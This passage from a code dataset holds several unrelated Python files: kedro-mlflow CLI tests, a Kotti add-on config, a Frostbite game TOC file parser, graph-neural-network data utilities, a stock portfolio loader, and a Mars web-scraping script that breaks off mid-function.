extract_cmd_from_help(msg):\n # [\\s\\S] is used instead of \".\" to match any character including new lines\n cmd_txt = re.search((r\"(?<=Commands:)([\\s\\S]+)$\"), msg).group(1)\n cmd_list_detailed = cmd_txt.split(\"\\n\")\n cmd_list = [\n cmd.strip().split(\" \")[0] for cmd in cmd_list_detailed if cmd.strip() != \"\"\n ]\n return cmd_list\n\n\ndef test_cli_global_discovered(monkeypatch, tmp_path):\n monkeypatch.chdir(tmp_path)\n cli_runner = CliRunner()\n result = cli_runner.invoke(info)\n\n assert result.exit_code == 0\n assert \"kedro_mlflow\" in result.output\n\n\n# TODO: add a test to check if \"kedro mlflow\" commmand is discovered\n# I can't make it work with cli.invoke\n# because discovery mechanisme is linked to setup.py\n\n\n## This command is temporarlily deactivated beacuse of a bug in kedro==0.17.3, see: https://github.com/Galileo-Galilei/kedro-mlflow/issues/193\n# def test_mlflow_commands_outside_kedro_project(monkeypatch, tmp_path):\n# monkeypatch.chdir(tmp_path)\n# cli_runner = CliRunner()\n# result = cli_runner.invoke(cli_mlflow)\n# assert {\"new\"} == set(extract_cmd_from_help(result.output))\n\n\ndef test_mlflow_commands_inside_kedro_project(monkeypatch, kedro_project):\n monkeypatch.chdir(kedro_project)\n # launch the command to initialize the project\n cli_runner = CliRunner()\n result = cli_runner.invoke(cli_mlflow)\n assert {\"init\", \"ui\"} == set(extract_cmd_from_help(result.output))\n assert \"You have not updated your template yet\" not in result.output\n\n\ndef test_cli_init(monkeypatch, kedro_project):\n # \"kedro_project\" is a pytest.fixture declared in conftest\n monkeypatch.chdir(kedro_project)\n cli_runner = CliRunner()\n result = cli_runner.invoke(cli_init)\n\n # FIRST TEST:\n # the command should have executed propery\n assert result.exit_code == 0\n\n # check mlflow.yml file\n assert \"'conf/local/mlflow.yml' successfully updated.\" in result.output\n assert (kedro_project / \"conf\" / \"local\" / \"mlflow.yml\").is_file()\n\n\ndef test_cli_init_existing_config(monkeypatch, kedro_project_with_mlflow_conf):\n # \"kedro_project\" is a pytest.fixture declared in conftest\n cli_runner = 
CliRunner()\n monkeypatch.chdir(kedro_project_with_mlflow_conf)\n bootstrap_project(kedro_project_with_mlflow_conf)\n\n with KedroSession.create(\n \"fake_project\", project_path=kedro_project_with_mlflow_conf\n ) as session:\n context = session.load_context()\n # emulate first call by writing a mlflow.yml file\n yaml_str = yaml.dump(dict(mlflow_tracking_uri=\"toto\"))\n (\n kedro_project_with_mlflow_conf / context.CONF_ROOT / \"local\" / \"mlflow.yml\"\n ).write_text(yaml_str)\n\n result = cli_runner.invoke(cli_init)\n\n # check an error message is raised\n assert \"A 'mlflow.yml' already exists\" in result.output\n\n # check the file remains unmodified\n assert get_mlflow_config().mlflow_tracking_uri.endswith(\"toto\")\n\n\ndef test_cli_init_existing_config_force_option(monkeypatch, kedro_project):\n # \"kedro_project\" is a pytest.fixture declared in conftest\n monkeypatch.chdir(kedro_project)\n cli_runner = CliRunner()\n\n bootstrap_project(kedro_project)\n with KedroSession.create(project_path=kedro_project) as session:\n context = session.load_context()\n\n # emulate first call by writing a mlflow.yml file\n yaml_str = yaml.dump(dict(mlflow_tracking_uri=\"toto\"))\n (kedro_project / context.CONF_ROOT / \"local\" / \"mlflow.yml\").write_text(\n yaml_str\n )\n\n result = cli_runner.invoke(cli_init, args=\"--force\")\n\n # check an error message is raised\n assert \"successfully updated\" in result.output\n\n # check the file remains unmodified\n assert get_mlflow_config().mlflow_tracking_uri.endswith(\"mlruns\")\n\n\n@pytest.mark.parametrize(\n \"env\",\n [\"base\", \"local\"],\n)\ndef test_cli_init_with_env(monkeypatch, kedro_project, env):\n # \"kedro_project\" is a pytest.fixture declared in conftest\n monkeypatch.chdir(kedro_project)\n cli_runner = CliRunner()\n result = cli_runner.invoke(cli_init, f\"--env {env}\")\n\n # FIRST TEST:\n # the command should have executed propery\n assert result.exit_code == 0\n\n # check mlflow.yml file\n assert f\"'conf/{env}/mlflow.yml' successfully updated.\" in result.output\n assert (kedro_project / \"conf\" / env / \"mlflow.yml\").is_file()\n\n\n@pytest.mark.parametrize(\n \"env\",\n [\"debug\"],\n)\ndef test_cli_init_with_wrong_env(monkeypatch, kedro_project, env):\n # \"kedro_project\" is a pytest.fixture declared in conftest\n monkeypatch.chdir(kedro_project)\n cli_runner = CliRunner()\n result = cli_runner.invoke(cli_init, f\"--env {env}\")\n\n # A warning message should appear\n assert f\"No env '{env}' found\" in result.output\n\n\n# TODO : This is a fake test. 
add a test to see if ui is properly up\n# I tried mimicking mlflow_cli with mock but did not achieve desired result\n# other solution is to use pytest-xprocess\n# TODO: create an initlaized_kedro_project fixture with a global scope\ndef test_ui_is_up(monkeypatch, mocker, kedro_project_with_mlflow_conf):\n\n monkeypatch.chdir(kedro_project_with_mlflow_conf)\n cli_runner = CliRunner()\n\n # This does not test anything : the goal is to check whether it raises an error\n ui_mocker = mocker.patch(\n \"subprocess.call\"\n ) # make the test succeed, but no a real test\n cli_runner.invoke(cli_ui)\n ui_mocker.assert_called_once_with(\n [\n \"mlflow\",\n \"ui\",\n \"--backend-store-uri\",\n (kedro_project_with_mlflow_conf / \"mlruns\").as_uri(),\n \"--host\",\n \"127.0.0.1\",\n \"--port\",\n \"5000\",\n ]\n )\n\n # OTHER ATTEMPT:\n # try:\n # import threading\n # thread = threading.Thread(target=subprocess.call, args=([\"kedro\", \"mlflow\", \"sqf\"],))\n # thread.start()\n # except Exception as err:\n # raise err\n # print(thread)\n # assert thread.is_alive()\n\n\ndef test_ui_overwrite_conf_at_runtime(\n monkeypatch, mocker, kedro_project_with_mlflow_conf\n):\n\n monkeypatch.chdir(kedro_project_with_mlflow_conf)\n cli_runner = CliRunner()\n\n # This does not test anything : the goal is to check whether it raises an error\n ui_mocker = mocker.patch(\n \"subprocess.call\"\n ) # make the test succeed, but no a real test\n cli_runner.invoke(cli_ui, [\"--host\", \"0.0.0.0\", \"--port\", \"5001\"])\n ui_mocker.assert_called_once_with(\n [\n \"mlflow\",\n \"ui\",\n \"--backend-store-uri\",\n (kedro_project_with_mlflow_conf / \"mlruns\").as_uri(),\n \"--host\",\n \"0.0.0.0\",\n \"--port\",\n \"5001\",\n ]\n )\n","sub_path":"tests/framework/cli/test_cli.py","file_name":"test_cli.py","file_ext":"py","file_size_in_byte":7287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"39546860","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nCreated on 2015-03-30\n:author: Andreas Kaiser (disko@binary-punks.com)\n\"\"\"\n\nimport datetime\nimport uuid\n\nfrom kotti.resources import File\nfrom pyramid.i18n import TranslationStringFactory\nfrom pyramid.renderers import JSON\nfrom pyramid.renderers import JSONP\n\n_ = TranslationStringFactory('kotti_conference')\n\n\ndef datetime_adapter(obj, request):\n \"\"\" Convert date or datetime into a string object that can be used in JSON.\n The best format for this is ISO 8601, as this can be parsed natively by all\n Javascript engines.\n\n :param obj: date or datetime to be converted to string\n :type obj: :class:`datetime.date` or :class:`datetime.datetime`\n\n :param request: current request\n :type request: :class:`pyramid.request.Request`\n\n :result: ISO formatted date(time)\n :rtype: str\n \"\"\"\n\n return obj.isoformat()\n\n\ndef uuid_adapter(obj, request):\n \"\"\" Convert uuid into a string that can be used in JSON (JSON / Javascript\n don't have a native UUID type).\n\n :param obj: UUID converted to string\n :type obj: :class:`uuid.UUID`\n\n :param request: current request\n :type request: :class:`pyramid.request.Request`\n\n :result: UUID string (e.g. 
5f2f5890-d720-11e4-85d4-a757eac847f5)\n    :rtype: str\n    \"\"\"\n\n    return str(obj)\n\n\ndef kotti_configure(settings):\n    \"\"\" Add a line like this to your .ini file::\n\n        kotti.configurators =\n            kotti_conference.kotti_configure\n\n    to enable the ``kotti_conference`` add-on.\n\n    :param settings: Kotti configuration dictionary.\n    :type settings: dict\n    \"\"\"\n\n    settings['pyramid.includes'] += ' kotti_conference'\n\n    settings['kotti.available_types'] += \\\n        ' kotti_conference.resources.Conference' \\\n        ' kotti_conference.resources.Speaker' \\\n        ' kotti_conference.resources.Talk'\n\n    settings['kotti.fanstatic.view_needed'] += ' kotti_conference.fanstatic.css_and_js'\n\n    File.type_info.addable_to.append('Conference')\n\n\ndef includeme(config):\n    \"\"\" Don't add this to your ``pyramid_includes``, but add the\n    ``kotti_configure`` above to your ``kotti.configurators`` instead.\n\n    :param config: Pyramid configurator object.\n    :type config: :class:`pyramid.config.Configurator`\n    \"\"\"\n\n    config.add_translation_dirs('kotti_conference:locale')\n    config.add_static_view('static-kotti_conference', 'kotti_conference:static')\n\n    # We're extending Pyramid's JSON renderer with some adapters to make it\n    # render date, datetime and uuid object without having to convert them\n    # every single time explicitly ourselves. Instead the conversion is now\n    # done implicitly by Pyramid and the adapter functions above. This is\n    # especially convenient in combination with ``__json__`` methods on the\n    # resource classes (or content types).\n    json_renderer = JSON(indent=4)\n    json_renderer.add_adapter(datetime.datetime, datetime_adapter)\n    json_renderer.add_adapter(datetime.date, datetime_adapter)\n    json_renderer.add_adapter(uuid.UUID, uuid_adapter)\n    config.add_renderer('json', json_renderer)\n\n    # Same for JSONP (http://en.wikipedia.org/wiki/JSONP).\n    jsonp_renderer = JSONP(indent=4)\n    jsonp_renderer.add_adapter(datetime.datetime, datetime_adapter)\n    jsonp_renderer.add_adapter(datetime.date, datetime_adapter)\n    jsonp_renderer.add_adapter(uuid.UUID, uuid_adapter)\n    config.add_renderer('jsonp', jsonp_renderer)\n\n    config.scan(__name__)\n","sub_path":"kotti_conference/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
+{"seq_id":"94012382","text":"#This is essentially a binary JSON type container.\n#Each entry can hold a value of a specific type or more entries embedded into it.\n#Values are always little endian.\nfrom struct import unpack\nimport io\nfrom collections import OrderedDict\n\ndef unXor(path):\n    \"\"\"Take a filename (usually toc or cat), decrypt the file if necessary, close it and return the unencrypted data in a memory stream.\n\n    As toc files are ~300 kB at most, make a memory stream even if the file wasn't encrypted in the first place (to get rid of the physical file handle).\"\"\"\n\n    f=open(path,\"rb\")\n    if path[-4:]==\".toc\":\n        f=unXorMEA(f) #Detect and decrypt Mass Effect: Andromeda.\n\n    magic=f.read(4)\n    if magic == b\"\\x00\\xD1\\xCE\\x00\": #the file is XOR encrypted and has a signature\n        f.seek(296) #skip the signature\n        key=[f.read(1)[0]^0x7b for i in range(260)] #bytes 257 258 259 are not used\n        encryptedData=f.read()\n        size=len(encryptedData)\n        data=bytearray(size) #initialize the buffer\n        for i in range(size):\n            data[i]=key[i%257]^encryptedData[i]\n    elif magic in (b\"\\x00\\xD1\\xCE\\x01\",b\"\\x00\\xD1\\xCE\\x03\"): #the file has a signature, but an empty key; 
it's not encrypted\n        f.seek(556) #skip signature + skip empty key\n        data=f.read()\n    else: #the file is not encrypted; no key + no signature\n        f.seek(0)\n        data=f.read()\n    f.close()\n\n    return io.BytesIO(data)\n\ndef unXorMEA(f):\n    f.seek(0,2)\n    size=f.tell()\n    f.seek(-32,2)\n    signature=f.read(32)\n    if signature!=b\"@e!adnXd$^!rfOsrDyIrI!xVgHeA!6Vc\":\n        f.seek(0)\n        return f\n\n    #Mass Effect: Andromeda uses custom encryption on TOC files.\n    f.seek(-36,2)\n    headerSize=unpackLE(\"I\",f.read(4))[0]\n    f.seek(0)\n    encryptedData=f.read(size-headerSize)\n    dataLen=len(encryptedData)\n    data=bytearray(dataLen)\n    key=encryptedData[0]\n    for i in range(dataLen):\n        data[i]=encryptedData[i]^key\n        key=((encryptedData[0]^encryptedData[i])-(i%256))&0xFF\n\n    f.close()\n    return io.BytesIO(data)\n\n\n\ndef decode7bit(f):\n    \"\"\"Reads the next few bytes in a file as LEB128/7bit encoding and returns an integer\"\"\"\n    result,shift = 0,0\n    while 1:\n        byte=f.read(1)[0]\n        result|=(byte&0x7f)<<shift\n        if byte>>7==0: return result\n        shift+=7\n\ndef readNullTerminatedString(f):\n    result=b\"\"\n    while 1:\n        byte=f.read(1)\n        if byte==b\"\\x00\": break\n        result+=byte\n\n    return result.decode()\n\ndef unpackLE(typ,data): return unpack(\"<\"+typ,data)\ndef unpackBE(typ,data): return unpack(\">\"+typ,data)\n\nclass Guid:\n    def __init__(self,f,bigEndian):\n        #The first 3 elements are native endian and the last one is big endian.\n        unpacker=unpackBE if bigEndian else unpackLE\n        data=f.read(16)\n        num1,num2,num3=unpacker(\"IHH\",data[0:8])\n        num4=unpackBE(\"Q\",data[8:16])[0]\n        self.val=num1,num2,num3,num4\n    def frombytes(data,bigEndian):\n        #Hack to init Guid from memory data.\n        f=io.BytesIO(data)\n        return Guid(f,bigEndian)\n    def __eq__(self,other):\n        return self.val==other.val\n    def __ne__(self,other):\n        return self.val!=other.val\n    def __hash__(self):\n        return hash(self.val)\n\n    def format(self):\n        return \"%08x-%04x-%04x-%04x-%012x\" % (self.val[0],self.val[1],self.val[2],\n            (self.val[3]>>48)&0xFFFF,self.val[3]&0x0000FFFFFFFFFFFF)\n    def isNull(self):\n        return self.val==(0,0,0,0)\n\nclass DbObjectId:\n    def __init__(self,f):\n        self.id=f.read(12)\n\nclass DbTimestamp:\n    def __init__(self,f):\n        self.timeData=f.read(8)\n\nclass DbRecordId:\n    def __init__(self,f):\n        self.extentId, self.pageId, self.slotId = unpackLE(\"HHH\",f.read(6))\n\nclass Vector4D:\n    def __init__(self,f):\n        self.x, self.y, self.z, self.w = unpackLE(\"ffff\",f.read(16))\n\nclass Matrix4x4:\n    def __init__(self,f):\n        self.vecs=list()\n        for i in range(4):\n            self.vecs.append(Vector4D(f))\n\nclass DbTimespan:\n    def __init__(self,f):\n        val=decode7bit(f)\n        lower=(val&0x00000000FFFFFFFF)\n        upper=(val&0xFFFFFFFF00000000)>>32\n        flag=lower&1\n        self.timeSpan=((lower>>1)^flag)|(((upper>>1)^flag)<<32)\n\nclass DbObjectType:\n    Eoo = 0x0\n    Array = 0x1\n    Object = 0x2\n    HomoArray = 0x3\n    Null = 0x4\n    ObjectId = 0x5\n    Bool = 0x6\n    String = 0x7\n    Integer = 0x8\n    Long = 0x9\n    VarInt = 0xA\n    Float = 0xB\n    Double = 0xC\n    Timestamp = 0xD\n    RecordId = 0xE\n    GUID = 0xF\n    SHA1 = 0x10\n    Matrix44 = 0x11\n    Vector4 = 0x12\n    Blob = 0x13\n    Attachment = 0x14\n    Timespan = 0x15\n    StringAtom = 0x16\n    TypedBlob = 0x17\n    Environment = 0x18\n    InternalMin = 0x0\n    InternalMax = 0x1F\n    Mask = 0x1F\n    TaggedField = 0x40\n    Anonymous = 0x80\n\n    def __init__(self):\n        pass\n\nclass DbObject:\n    def __init__(self,f,defaultVal=None): #read the data from file\n        if not f:\n            self.content=defaultVal\n            return\n\n        header=f.read(1)[0]\n        self.typ=header&0x1F\n        self.flags=header>>5\n        if self.flags&0x04:\n            #root entry\n            self.name=\"\"\n        
else:\n            self.name=readNullTerminatedString(f)\n\n        if self.typ==DbObjectType.Array:\n            self.listLength=decode7bit(f) #self\n            entries=list()\n            endPos=f.tell()+self.listLength\n            while f.tell()<endPos:\n                entry=DbObject(f)\n                if entry.typ==DbObjectType.Eoo: break\n                entries.append(entry)\n            self.content=entries\n\n        elif self.typ==DbObjectType.Object:\n            self.objLength=decode7bit(f)\n            self.elems=OrderedDict()\n            endPos=f.tell()+self.objLength\n            while f.tell()<endPos:\n                entry=DbObject(f)\n                if entry.typ==DbObjectType.Eoo: break\n                self.elems[entry.name]=entry\n            self.content=self.elems\n\n        elif self.typ==DbObjectType.Null:\n            self.content=None\n\n        elif self.typ==DbObjectType.ObjectId:\n            self.content=DbObjectId(f)\n\n        elif self.typ==DbObjectType.Bool:\n            self.content=(f.read(1)[0]!=0)\n\n        elif self.typ==DbObjectType.String:\n            stringLength=decode7bit(f)\n            self.content=f.read(stringLength)[:-1].decode() #null-terminated\n\n        elif self.typ==DbObjectType.Integer:\n            self.content=unpackLE(\"i\",f.read(4))[0]\n\n        elif self.typ==DbObjectType.Long:\n            self.content=unpackLE(\"q\",f.read(8))[0]\n\n        elif self.typ==DbObjectType.VarInt:\n            #zigzag-encoded 7bit integer\n            val=decode7bit(f)\n            self.content=(val>>1)^(val&1)\n\n        elif self.typ==DbObjectType.Float:\n            self.content=unpackLE(\"f\",f.read(4))[0]\n\n        elif self.typ==DbObjectType.Double:\n            self.content=unpackLE(\"d\",f.read(8))[0]\n\n        elif self.typ==DbObjectType.Timestamp:\n            self.content=DbTimestamp(f)\n\n        elif self.typ==DbObjectType.RecordId:\n            self.content=DbRecordId(f)\n\n        elif self.typ==DbObjectType.GUID:\n            self.content=Guid(f,False)\n\n        elif self.typ==DbObjectType.SHA1:\n            self.content=f.read(20)\n\n        elif self.typ==DbObjectType.Vector4:\n            self.content=Vector4D(f)\n\n        elif self.typ==DbObjectType.Matrix44:\n            self.content=Matrix4x4(f)\n\n        elif self.typ==DbObjectType.Blob:\n            self.content=f.read(decode7bit(f))\n\n        elif self.typ==DbObjectType.Attachment:\n            self.content=f.read(20) #SHA1\n\n        elif self.typ==DbObjectType.Timespan:\n            self.content=DbTimespan(f)\n\n        else:\n            raise Exception(\"Unhandled DB object type 0x%02x at 0x%08x.\" % (self.typ,f.tell()))\n\n    def get(self,fieldName,defaultVal=None):\n        try: return self.elems[fieldName].content\n        except: return defaultVal\n\n    def getSubObject(self,fieldName):\n        try: return self.elems[fieldName]\n        except: return None\n\ndef readToc(tocPath): #take a filename, decrypt the file and make an entry out of it\n    return DbObject(unXor(tocPath))\n","sub_path":"frostbite3/dbo.py","file_name":"dbo.py","file_ext":"py","file_size_in_byte":8251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
+{"seq_id":"575281244","text":"import numpy as np\nimport scipy.sparse as sp\nimport torch\nimport sys\nimport pickle as pkl\nimport networkx as nx\n\ndef parse_index_file(filename):\n    \"\"\"Parse index file.\"\"\"\n    index = []\n    for line in open(filename):\n        index.append(int(line.strip()))\n    return index\n\n\ndef load_data(path=\"citation\", dataset=\"pubmed\"):\n    \"\"\"Load citation network dataset.\"\"\"\n    print('Loading {} dataset...'.format(dataset))\n\n    names = ['x', 'y', 'tx', 'ty', 'allx', 'ally', 'graph']\n    objects = []\n    for i in range(len(names)):\n        with open(\"{}/{}/ind.{}.{}\".format(path, dataset, dataset, names[i]), 'rb') as f:\n            if sys.version_info > (3, 0):\n                objects.append(pkl.load(f, encoding='latin1'))\n            else:\n                objects.append(pkl.load(f))\n\n    x, y, tx, ty, allx, ally, graph = tuple(objects) # x等csr矩阵,y等numpy.ndarray,graph是collections.defaultdict\n    test_idx_reorder = parse_index_file(\"{}/{}/ind.{}.test.index\".format(path, dataset, dataset))\n    test_idx_range = np.sort(test_idx_reorder)\n\n    if dataset == 'citeseer':\n        # Fix citeseer dataset (there are some isolated nodes in the graph)\n        # Find isolated nodes, add them as zero-vecs into the right position\n        test_idx_range_full = range(min(test_idx_reorder), max(test_idx_reorder)+1)\n        tx_extended = sp.lil_matrix((len(test_idx_range_full), x.shape[1])) # FutureWarning: future versions will not create a writeable array from broadcast_array. 
Set the writable flag explicitly to avoid this warning.\n tx_extended[test_idx_range-min(test_idx_range), :] = tx\n tx = tx_extended\n ty_extended = np.zeros((len(test_idx_range_full), y.shape[1]))\n ty_extended[test_idx_range-min(test_idx_range), :] = ty\n ty = ty_extended\n\n features = sp.vstack((allx, tx)).tolil() # FutureWarning同上\n features[test_idx_reorder, :] = features[test_idx_range, :]\n features = preprocess_features(features) # 得到features是csr\n\n adj = nx.adjacency_matrix(nx.from_dict_of_lists(graph)) # 得到adj是csr\n adj = preprocess_adj(adj)\n\n labels = np.vstack((ally, ty))\n labels[test_idx_reorder, :] = labels[test_idx_range, :]\n\n idx_test = test_idx_range.tolist()\n idx_train = range(len(y))\n idx_val = range(len(y), len(y)+500)\n\n features = torch.FloatTensor(np.array(features.todense()))\n labels = torch.LongTensor(np.where(labels)[1]) # citeseer数据集中孤立点会被忽略\n adj = sparse_mx_to_torch_sparse_tensor(adj)\n \n idx_train = torch.LongTensor(idx_train)\n idx_val = torch.LongTensor(idx_val)\n idx_test = torch.LongTensor(idx_test)\n\n return adj, features, labels, idx_train, idx_val, idx_test\n\ndef preprocess_features(features):\n \"\"\"Row-normalize feature matrix.\"\"\"\n rowsum = np.array(features.sum(1))\n r_inv = np.power(rowsum, -1).flatten()\n r_inv[np.isinf(r_inv)] = 0.\n r_mat_inv = sp.diags(r_inv)\n features = r_mat_inv.dot(features)\n return features\n\ndef normalize_adj(adj):\n \"\"\"Symmetrically normalize adjacency matrix.\"\"\"\n adj = sp.coo_matrix(adj)\n rowsum = np.array(adj.sum(1))\n d_inv_sqrt = np.power(rowsum, -0.5).flatten()\n d_inv_sqrt[np.isinf(d_inv_sqrt)] = 0.\n d_mat_inv_sqrt = sp.diags(d_inv_sqrt)\n return adj.dot(d_mat_inv_sqrt).transpose().dot(d_mat_inv_sqrt).tocoo()\n\n\ndef preprocess_adj(adj):\n \"\"\"Preprocessing of adjacency matrix for simple GCN model.\"\"\"\n adj_normalized = normalize_adj(adj + sp.eye(adj.shape[0]))\n return adj_normalized\n\n\ndef accuracy(output, labels):\n preds = output.max(1)[1].type_as(labels)\n correct = preds.eq(labels).double()\n correct = correct.sum()\n return correct / len(labels)\n\n\ndef sparse_mx_to_torch_sparse_tensor(sparse_mx):\n \"\"\"Convert a scipy sparse matrix to a torch sparse tensor.\"\"\"\n sparse_mx = sparse_mx.tocoo().astype(np.float32)\n indices = torch.from_numpy(\n np.vstack((sparse_mx.row, sparse_mx.col)).astype(np.int64))\n values = torch.from_numpy(sparse_mx.data)\n shape = torch.Size(sparse_mx.shape)\n return torch.sparse.FloatTensor(indices, values, shape)","sub_path":"codes/gcn/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"499730991","text":"\"\"\"Portfolio parser module\"\"\"\n__docformat__ = \"numpy\"\n\nimport os\nimport argparse\nfrom typing import List, Tuple\nfrom tabulate import tabulate\nimport pandas as pd\nimport yfinance as yf\nfrom gamestonk_terminal.helper_funcs import check_valid_path, parse_known_args_and_warn\n\n# pylint: disable=no-member,unsupported-assignment-operation,unsubscriptable-object\n\n\ndef load_csv_portfolio(other_args: List[str]) -> Tuple[str, pd.DataFrame]:\n \"\"\"Load portfolio from csv\n\n Parameters\n ----------\n other_args: List[str]\n Argparse arguments\n\n Returns\n ----------\n portfolio_name : str\n Portfolio name\n portfolio : pd.DataFrame\n Portfolio dataframe\n \"\"\"\n parser = argparse.ArgumentParser(\n prog=\"load\",\n add_help=False,\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n 
description=\"Function to get portfolio from predefined csv file inside portfolios folder\",\n )\n parser.add_argument(\n \"-p\",\n \"--path\",\n default=\"my_portfolio\",\n type=check_valid_path,\n help=\"Path to csv file\",\n dest=\"path\",\n )\n parser.add_argument(\n \"--no_sector\",\n action=\"store_true\",\n default=False,\n help=\"Add sector to dataframe\",\n dest=\"sector\",\n )\n parser.add_argument(\n \"--no_last_price\",\n action=\"store_true\",\n default=False,\n help=\"Add last price from yfinance\",\n dest=\"last_price\",\n )\n parser.add_argument(\n \"--nan\",\n action=\"store_true\",\n default=False,\n help=\"Show nan entries from csv\",\n dest=\"show_nan\",\n )\n\n try:\n ns_parser = parse_known_args_and_warn(parser, other_args)\n if not ns_parser:\n return \"\", pd.DataFrame()\n\n full_path = os.path.abspath(\n os.path.join(\n \"gamestonk_terminal\",\n \"portfolio\",\n \"portfolio_analysis\",\n \"portfolios\",\n f\"{ns_parser.path}.csv\",\n )\n )\n df = pd.read_csv(full_path)\n\n if not ns_parser.sector:\n df[\"sector\"] = df.apply(\n lambda row: yf.Ticker(row.Ticker).info[\"sector\"]\n if \"sector\" in yf.Ticker(row.Ticker).info.keys()\n else \"yf Other\",\n axis=1,\n )\n\n if not ns_parser.last_price:\n df[\"last_price\"] = df.apply(\n lambda row: yf.Ticker(row.Ticker)\n .history(period=\"1d\")[\"Close\"][-1]\n .round(2),\n axis=1,\n )\n df[\"value\"] = df[\"Shares\"] * df[\"last_price\"]\n\n if not ns_parser.show_nan:\n df = df.dropna(axis=1)\n\n print(tabulate(df, tablefmt=\"fancy_grid\", headers=df.columns))\n print(\"\")\n return ns_parser.path, df\n\n except Exception as e:\n print(e, \"\\n\")\n return \"\", pd.DataFrame()\n\n\ndef breakdown_by_group(portfolio: pd.DataFrame, other_args: List[str]):\n \"\"\"Breakdown of portfolio by a specified group\n\n Parameters\n ----------\n portfolio: pd.DataFrame\n Dataframe of portfolio generated from menu\n other_args: List[str]\n Argparse arguments\n \"\"\"\n parser = argparse.ArgumentParser(\n prog=\"groupby\",\n add_help=False,\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n description=\"Displays portfolio grouped by a given column\",\n )\n parser.add_argument(\n \"-g\",\n \"--group\",\n type=str,\n dest=\"group\",\n default=\"Ticker\",\n help=\"Column to group by\",\n )\n\n # The following arguments will be used in a later PR for customizable 'reports'\n\n # The --func flag will need to be tested that it exists for pandas groupby\n # parser.add_argument(\"-f\",\n # \"--func\",\n # type=str,\n # dest=\"function\",\n # help=\"Aggregate function to apply to groups\"\n # )\n # parser.add_argument(\"-d\",\n # \"--display\",\n # default = None,\n # help = \"Columns to display\",\n # dest=\"cols\")\n\n try:\n ns_parser = parse_known_args_and_warn(parser, other_args)\n if not ns_parser:\n return\n\n group_column = ns_parser.group\n if group_column not in portfolio.columns:\n print(f\"The column {group_column} is not found in your portfolio data\")\n return\n\n grouped_df = pd.DataFrame(portfolio.groupby(group_column).agg(sum)[\"value\"])\n print(\n tabulate(grouped_df, headers=[group_column, \"value\"], tablefmt=\"fancy_grid\")\n )\n print(\"\")\n\n # The following will be used to display certain columns (i.e show Dollars or Percents)\n # valid_columns = []\n # if ns_parser.cols:\n # for col in ns_parser.cols:\n # if col in portfolio.columns:\n # valid_columns.append(col)\n # else:\n # print(f\"{col} not in portfolio columns\")\n # if valid_columns:\n # valid_columns = [\"Shares\"]\n\n except Exception as e:\n 
print(e, \"\\n\")\n","sub_path":"gamestonk_terminal/portfolio/portfolio_analysis/portfolio_parser.py","file_name":"portfolio_parser.py","file_ext":"py","file_size_in_byte":5267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"378132973","text":"# Dependencies\nfrom bs4 import BeautifulSoup as bs\nimport requests\nfrom splinter import Browser\nimport pandas as pd\nimport time\nimport os\n\n\ndef init_browser():\n \"\"\" Connects path to chromedriver \"\"\"\n \n executable_path = {'executable_path': 'chromedriver.exe'}\n return Browser('chrome', **executable_path, headless=False)\nmarsdata = {}\n\ndef scrape_News():\n \n # URL of page to be scraped\n news_url = 'https://mars.nasa.gov/news/'\n browser = init_browser()\n browser.visit(news_url)\n time.sleep(3)\n news_response = requests.get(news_url)\n\n # Create BeautifulSoup object; \n news_soup = bs(news_response.text, 'lxml')\n try:\n # pull latest news title and paragrapgh\n results = news_soup.find('div', class_='features')\n title = results.find('div', class_='content_title').text\n paragraph = results.find('div', class_='rollover_description').text\n\n \n #store results into a dictionary marsdata\n marsdata[\"Latest_news_titles\"] = title\n marsdata[\"Latest_news_summary\"] = paragraph\n\n except AttributeError as e:\n return(e)\n \n finally:\n browser.quit()\n\n # task 2\ndef scrape_Weather():\n\n twitter_url = 'https://twitter.com/marswxreport?lang=en'\n twitter_response = requests.get(twitter_url)\n twitter_soup = bs(twitter_response.text, 'lxml')\n try:\n twitter_result = twitter_soup.find('div', class_='js-tweet-text-container')\n mars_weather=twitter_result.text.strip()\n \n \n #store results into a dictionary marsdata\n marsdata[\"marsweather\"] = mars_weather\n\n except AttributeError as e:\n print(e)\n \n \n\n # # task 3\ndef scrape_Image():\n # Call on chromedriver function to use for splinter\n browser = init_browser()\n\n image_url = 'https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars'\n \n browser.visit(image_url)\n\n time.sleep(1)\n try:\n browser.click_link_by_partial_text('FULL IMAGE')\n image_html = browser.html\n\n image_soup = bs(image_html, \"html.parser\")\n \n featured_image = image_soup.select_one(\".carousel_item\").get(\"style\")\n featured_image = featured_image.split(\"\\'\")[1]\n featured_image_url = f'https://www.jpl.nasa.gov{featured_image}'\n \n # Store url to dictionary\n marsdata[\"featured_image_url\"] = featured_image_url\n except AttributeError as e:\n print(e)\n finally:\n browser.quit()\n\n # task 4\ndef scrape_Facts():\n browser = init_browser()\n facts_url = 'https://space-facts.com/mars/'\n browser.visit(facts_url)\n time.sleep(1)\n try:\n facts = pd.read_html(facts_url)\n mars_df = facts[0]\n mars_df.columns = ['Description', 'Value']\n mars_df.set_index('Description', inplace=True)\n\n mars_facts = mars_df.to_html()\n mars_facts.replace(\"\\n\",\"\")\n mars_df.to_html('mars_facts.html')\n \n marsdata['mars_facts'] = mars_facts\n\n print('Mars Facts:'+ mars_facts)\n \n except AttributeError as e:\n print(e)\n\n finally:\n browser.quit()\n \n #task 5\ndef scrape_Hemispheres():\n # Call on chromedriver function to use for splinter\n browser = init_browser()\n hemisphere_url = 'https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars'\n browser.visit(hemisphere_url)\n time.sleep(2)\n hemisphere_html = browser.html\n hemisphere_soup = bs(hemisphere_html, 'lxml')\n base_url 
